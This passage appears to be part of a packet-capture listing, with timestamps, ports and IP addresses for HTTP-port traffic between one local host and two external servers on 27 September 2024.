Sep 27, 2024 04:21:17.609021902 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609034061 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609069109 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609069109 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609117031 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609127045 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609137058 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609148026 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609162092 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609210014 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609220982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609230042 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609241009 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609249115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609277964 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609277964 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609294891 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609304905 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609316111 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609354973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609354973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609392881 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609402895 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609410048 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609415054 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609421015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609469891 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609479904 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609491110 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609510899 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609520912 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609533072 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609544992 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609544992 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609582901 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609594107 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609632015 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609632015 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609635115 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609647036 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609657049 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609668016 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609669924 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609718084 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609810114 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609819889 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609831095 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609848976 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609853029 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609860897 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609873056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609884024 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609894037 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.609905005 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.609905005 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.610131979 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.633444071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633455992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633466959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633505106 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.633527994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633539915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633549929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633554935 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.633563995 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.633589983 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.633621931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.636007071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636019945 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636029959 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636040926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636053085 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636063099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636074066 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.636075974 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.636142969 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640311956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640347004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640357971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640366077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640408039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640408039 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640428066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640439034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640450001 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640460014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640474081 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640527964 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640539885 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640549898 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640552998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640552998 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640562057 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640574932 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640609026 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.640640974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640640974 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.640742064 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.641736031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641746044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641755104 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641767979 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641778946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641789913 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641799927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641810894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.641824007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.641824007 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.641863108 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642267942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642296076 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642306089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642327070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642338037 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642347097 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642358065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642371893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642381907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642389059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642458916 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642724991 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642775059 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642776966 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642786980 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642832041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642838955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642838955 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642843962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642858028 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642868042 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642923117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642942905 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642954111 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642963886 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642978907 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642988920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.642992973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.642992973 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643018961 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643029928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643050909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643060923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643079996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643079996 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643249035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643558025 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643569946 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643583059 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643645048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643645048 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643660069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643671989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643682957 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643693924 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643719912 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643724918 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643738031 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643748045 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643759012 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643785954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643785954 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643805027 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643815994 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643817902 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643829107 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643838882 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.643882990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.643908978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.653409958 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653476954 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653476954 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653489113 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653501987 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653513908 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653513908 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653526068 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653537035 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653558969 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653569937 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653575897 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653582096 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653597116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653600931 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653614998 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653625965 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653636932 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653637886 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653647900 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653673887 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653697968 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653719902 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653733015 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653743982 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653758049 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653758049 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653769016 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653775930 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653819084 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653836966 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653846979 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653857946 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653884888 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653903008 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.653951883 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653963089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653974056 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653985023 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653997898 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.653999090 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654009104 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654019117 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654021025 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654031038 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654052973 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654073000 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654077053 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654084921 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654095888 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654108047 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654115915 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654158115 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654175043 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654186010 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654198885 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654207945 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654231071 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654247999 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654258013 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654258966 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654269934 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654282093 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654293060 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654314041 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654406071 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654417992 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654453039 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654457092 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654468060 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654479027 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654485941 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654514074 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654546022 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654547930 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654557943 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654568911 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654580116 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654580116 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.654603958 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.654633045 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.669091940 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669104099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669115067 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669142008 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669152975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669162989 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669163942 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.669174910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669187069 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.669254065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.669254065 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671716928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671729088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671740055 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671783924 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671791077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671803951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671822071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671838999 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671850920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671861887 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671863079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671863079 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671874046 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671931028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671931028 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.671937943 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671947956 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671967983 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.671978951 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672002077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672002077 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672008038 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672020912 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672030926 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672044992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672044992 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672111034 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672122955 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672133923 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672167063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672167063 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672182083 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672188997 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672203064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672216892 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.672274113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.672274113 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.690526009 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690538883 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690551043 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690570116 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690581083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690589905 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.690592051 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690603971 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.690660000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.690660000 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.691761017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691781044 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691792011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691823006 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691833019 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691843987 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691910982 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:17.691919088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.691970110 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.691970110 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.691997051 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:17.695771933 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695823908 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.695827007 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695837021 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695848942 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695862055 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.695875883 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695887089 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695897102 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695898056 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.695909023 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695920944 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.695950031 CEST	49722	80	192.168.2.5	185.215.113.17
Sep 27, 2024 04:21:17.695965052 CEST	80	49722	185.215.113.17	192.168.2.5
Sep 27, 2024 04:21:17.695976973 CEST	80	49722	185.215.113.17	192.168.2.5
